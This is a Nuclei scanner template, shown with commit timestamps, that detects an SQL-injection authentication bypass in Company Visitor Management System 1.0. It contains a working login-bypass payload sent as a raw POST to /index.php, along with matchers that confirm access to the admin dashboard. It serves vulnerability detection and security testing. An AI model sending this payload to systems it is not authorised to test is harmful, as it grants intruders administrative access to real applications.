nuclei-templates/vulnerabilities/other/cvms-sqli.yaml

39 lines
903 B
YAML
Raw Normal View History

2022-07-21 07:27:46 +00:00
id: cvms-sqli
info:
name: Company Visitor Management System (CVMS) 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Company Visitor Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48884
2022-07-25 18:11:06 +00:00
metadata:
verified: true
tags: cvms,sqli,auth-bypass,cms,edb
2022-07-21 07:27:46 +00:00
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-25 18:11:06 +00:00
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
2022-07-21 07:27:46 +00:00
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-25 18:09:57 +00:00
- 'Admin user'
2022-07-21 07:27:46 +00:00
- 'Dashboard'
2022-07-25 18:09:57 +00:00
- 'CVMS'
condition: and
2022-07-21 07:27:46 +00:00
- type: status
status:
- 200